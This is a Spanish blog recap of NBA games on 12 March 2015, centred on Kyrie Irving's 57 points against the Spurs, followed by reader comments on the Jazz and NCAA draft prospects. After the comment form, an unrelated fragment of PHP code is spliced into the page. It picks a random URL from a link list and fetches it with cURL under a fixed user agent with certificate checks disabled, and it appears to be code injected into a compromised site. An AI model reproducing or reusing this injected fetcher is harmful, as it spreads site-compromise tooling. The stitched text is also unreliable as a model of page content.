La Crónica: Histórico Kyrie

13 de March de 2015 por MagicJohnson32

Hoy nos ha costado encontrar las palabras para narrar el partido entre Spurs y Cavs, especialmente por lo que respecta a la actuación de Kyrie Irving. Finalmente lo hemos logrado, y además nos reservamos algunos epítetos para los Pacers, que no detienen su ascenso, y para Rudy Gobert, gigantesco anoche ante los Rockets. Han pasado más cosas, como el regreso de Derek Fisher al Staples.

Allá vamos.

kyrie_lbj

Cleveland Cavaliers 128 – San Antonio Spurs 125 (OT)

Wow. ¿Cómo explicar la actuación de Kyrie Irving anoche en el AT&T de San Antonio? Necesariamente hay que calificarla de histórica, y lo es en varios aspectos: sus 57 puntos son la mayor anotación individual lograda por un jugador de los Cavs (supera los 56 de LeBron) y la mayor jamás recibida por los Spurs de Popovich; además, desde Wilt Chamberlain en el 62, nadie anotaba tantos puntos ante el campeón vigente e Irving es el tercer jugador de la historia con más de un partido por encima de los 50 puntos antes de cumplir 23 años (LeBron y Rick Barry son los otros dos)… En fin, el lector se hace una idea. Pero además hay que añadirle el contexto de un partido extremadamente competitivo ante unos Spurs que vuelven a desplegar sus mejores bazas en forma de un baloncesto colectivo al alcance de poquísimos. Resumiéndolo en una frase: los Spurs fueron mejores. Duncan y Kawhi rozaron el triple doble, Parker demostró que ha recuperado su mejor nivel y Green fue una ametralladora. Cualquier rival habría capitulado y de hecho los Spurs tuvieron a los Cavs contra las cuerdas, 104-110 a falta de 33 segundos para la conclusión. Para entonces, Kyrie Irving ya sumaba 40 puntos, y sin embargo lo mejor estaba por llegar. El base de los Cavs anotó un triple para reducir la diferencia a 3, Parker erró un tiro pero Leonard atrapó el rebote ofensivo y fue a la línea de tiros libres a falta de 4 segundos para el final; Kawhi falló los dos lanzamientos y dejó la puerta abierta a una nueva heroicidad de Irving, que enchufó un triple espectacular sobre la bocina para forzar la prórroga. En el tiempo extra siguió el recital con otros 11 puntos de Kyrie que acabaron por doblegar a los Spurs. Por si no había quedado claro: este partido tenéis que verlo.

Aquí os dejamos un amplio resumen.

Milwaukee Bucks 103 – Indiana Pacers 109 (OT)

Nos lo venía avisando el compañero Azabel: atención a los Pacers. La baja de Paul George no ha hecho más que reforzar la coraza de un bloque cada vez menos dependiente de actuaciones individuales. Así se explica que, pese a un nuevo bajón en el rendimiento de Roy Hibbert, los Pacers sean el mejor equipo desde el All Star y se estén elevando por encima del grupo que pelea por la octava plaza del Este. Anoche sumaron su séptima victoria consecutiva ante el que lleva camino de convertirse en su rival directo por la sexta posición, los Bucks, que dominaron de inicio pero, a diferencia de los Pacers, dependieron en exceso del rendimiento de sus titulares. Cuando los entrenadores iniciaron sus rotaciones, Indiana empezó a recuperar el terreno perdido. Stuckey y Scola fueron fundamentales en invertir la inercia del partido, que se inclinó del lado local. Los Pacers llegaron a estar 10 arriba ya en el último cuarto, pero no anotaron en los últimos 2:45 y cinco puntos de Ilyasova mandaron el partido a la prórroga después de que ambos equipos desperdiciasen sus últimas posesiones. En el tiempo extra la defensa de los Pacers impuso su ley y los de Vogel se sitúan a 3,5 partidos de Milwaukee en la clasificación.

Resto de la jornada

Los Jazz llegan tarde a la lucha por los Playoffs (es lo que tiene jugar en el Oeste) pero hay que ver cómo le han sentado los movimientos en el deadline. Desde la marcha de Kanter, y la consiguiente promoción de Gobert a la titularidad, son la mejor defensa de la liga. Anoche lo comprobaron los Rockets, derrotados claramente (91-109) ante una actuación fabulosa de Gobert y Hayward. Corey Brewer volvió a ser el mejor por parte de Houston, lo que no acaba de ser una buena noticia para McHale. En Washington, tal vez motivado por la baja de Conley, Joerger decidió renunciar a la victoria y dar descanso a Gasol, Randolph y Tony Allen. Pese al buen arranque de los Grizzlies, el resultado era inevitable en forma de clara victoria de los Wizards (87-107). Y por último, el duelo por todo lo bajo entre Knicks y Lakers, con el único aliciente del regreso de Derek Fisher al Staples esta vez como técnico. El triunfo se lo llevaron los de NY y la pelea por el pick #1 del draft 2015 se presenta un poco más ajustada.

PREMIOS

MVP: Histórico partido de Kyrie Irving, autor de 57 puntos (27 entre el último cuarto y la prórroga), 5 asistencias y 4 robos. Hay que ser muy bueno para someter a los Spurs de esta manera.

Rookie: La ausencia de Gasol y Randolph dio minutos a Jarnell Stokes y el ex de Tennessee respondió con 13 puntos, 8 rebotes y 3 robos.

Sorpresa: Podríamos hablar de los 17 puntos y 15 rebotes de Luis Scola o de los 19 puntos, 10 rebotes de Ersan Ilyasova pero aunque cada día que pasa es menos sorpresa, lo suyo es nombrar al francés Rudy Gobert. Tal vez picado por la exhibición de ayer de Drummond, el de los Jazz se fue a los 19 puntos, 22 rebotes y 4 tapones.

Decepción: 2º partido consecutivo de James Harden a un nivel impropio de un MVP. El de los Rockets volvió a quedarse sin anotar un triple y falló 10 de 13 lanzamientos a canasta. De todas maneras, en términos absolutos peor le fueron las cosas a Trey Burke, que se quedó a 0 tras fallar 8 tiros.

Esfuerzo en vano: Tony Parker (31-5-6), Tim Duncan (18-11-8), Kawhi Leonard (24-9-7), Danny Green (24-4)… Todos cayeron ante el talento de Kyrie Irving.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    “What a game America!” creo que fue Webber en la retransmisión de la TNT,con esa frase tan corta se puede resumir el partido,y es que no falla,partido de LeBron contra los Spurs y siempre hay algo que contar,en este caso el protagonismo absoluto para el señor Irving,graduándose esta temporada en la élite de los ganadores,con los PO en el horizonte presentándose como la prueba definitiva para él.Cierran los Cavaliers un 0-10 ante los tejanos desde marzo de 2010,5 años sin ganarles que acaban con la victoria de esta pasada noche.Quien no haya visto el partido que lo vea que lo agradecerá.

    Vaya ojo Denise (triceratops) con Gobert,te debe una parte de su próxima contrato tio.

      Citar

  2. Triceratops dice:
    #2

    Ruxixón:

    Vaya ojo Denise (triceratops) con Gobert,te debe una parte de su próxima contrato tio.

    Jaja, bueno, yo creo que tampoco hacía falta ser un lince. Durante el Draft ’13 vi alguno de sus videos en el Cholet, y cuando ves una bestia parda de 20 años, coordinado, agil para correr la pista, y con unos brazos larguisimos que apenas debe saltar para machacar, lo unico que se te debe venir a la cabeza es que cogiendo musculatura y algunos conceptos ofensivos, debía ser uno de los mejores reboteadores, defensores, intimidadores y taponadores de la liga.
    Denver lo robó en el pick 27 pero habiendo sido muy hábiles en elegirlo, fueron inutiles en traspasarlo a los Jazz por un pick de 2º ronda!!.

    Siempre tuve confianza en él, y me desesperó como el merluzo de Corbin, uno de esos tipos como Vaughn que jamás deberían volver a pisar una cancha, lo mandó a la D-League.

    Me encanta el nucleo joven de los Jazz, el mejor de la liga de largo, y eso que su jugador franquicia Hayward nunca me ha emocionado, pero ves a Gobert, Burke, Exum (que se va a salir el próximo año, ya vereis), Rodney Hood. Es que tienen ahí un nucleo que si algun pez gordo de la liga quisiera moverse a Utah en la agencia libre, tendrían un equipazo para los proximos 3-4 años.

      Citar

  3. Ruxixón dice:
    #3

    A mí también me gustan,y eso a pesar de algún bajón de juego durante la temporada,pero tras el All Star,Snyder ha dado con la tecla totalmente,probablemente gracias a la salida de Kanter,facilitándole la titularidad de Gobert casi porque no quedaba otra.Ya exprese aquí que quizás un tío con veterania sería ya la leche,pero bueno,con lo que tienen y la imagen que están dando sólo se pueden ser optimista.

    A todo esto me he puesto a ver lo que puedo de NCAA y para mi gusto,Russell por supuesto el que más me enamora,pero Towns me parece una cosa muy seria (acaba de ganar Kentucky a Florida),y me gusta más que Okafor.Seguro que llega éste y se la saca durante la Madness,como durante toda la temporada pero vaya.Una pena que lo de Mudiay no se pueda testar al nivel college,lo que le vi en vídeos de los PO en China no sirve para nada.SI me quedo con los best-case scenario de cada uno (Mudiay-Wall vs Okafor-Al Jefferson) yo bajaría a Okafor en un posible mock draft,algo que en la realidad es casi imposible que pase.

    Por cierto,hablando del partido de Kentucky una bacalá infame,juegan fatal,pero tienen tal dominio interior que los hacen muy superiores al resto,más que el año pasado.Caunley-Stein,Dakari Johnson,Marcus Lee,Towns…aburren.Hoy hay jornada con grandes partidos:

    Virginia – North Carolina –>12 de la noche hora española
    Ohio St – Michigan St (si quereis ver a Russell) –> 2
    Arizona – UCLA –> 2

    Yo ya no puedo ver más,pero ahí andaré en la MM a todo lo que buenamente pueda,que empieza ya el 15 con el Selection Sunday y los primeros partidos el 17.

      Citar

  4. Nacho dice:
    #4

    Viendo el Hornets-Bulls a pesar del sueño, y notición!!! los de Chicago moviendo muy bien el balón. El alto porcentaje de tiro es muestra de ello. Brooks bien en el tiro y sin marear mucho a sus compañeros. ¿Espejismo?

      Citar

  5. Nacho dice:
    #5

    La cuestión será si también lo hacen cuando se encuentren con defensas

      Citar

  6. Triceratops dice:
    #6

    Ruxixón:

    A todo esto me he puesto a ver lo que puedo de NCAA y para mi gusto,Russell por supuesto el que más me enamora,pero Towns me parece una cosa muy seria (acaba de ganar Kentucky a Florida),y me gusta más que Okafor.Seguro que llega éste y se la saca durante la Madness,como durante toda la temporada pero vaya.Una pena que lo de Mudiay no se pueda testar al nivel college,lo que le vi en vídeos de los PO en China no sirve para nada.SI me quedo con los best-case scenario de cada uno (Mudiay-Wall vs Okafor-Al Jefferson) yo bajaría a Okafor en un posible mock draft,algo que en la realidad es casi imposible que pase.

    Pues te he hecho caso y he visto algo de Kentucky, y al menos hoy, la incidencia en el juego de Towns ha sido mínima, por no decir que solo ha tirado una vez en todo el partido y la ha fallado, y no veas si se carga de faltas pronto. En cambio, Okafor se cascó ayer un 28-8 con 13-18 en TC.

    Me gusta bastante Stanley Johnson, que si los Magic pillan el pick 5 es claramente su elección ya que solo escogen ultimamente jugadores de sus características, físicamente bestiales, con capacidad defensiva, centrados en el juego y sacrificados en el campo aunque sean limitados en ataque.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>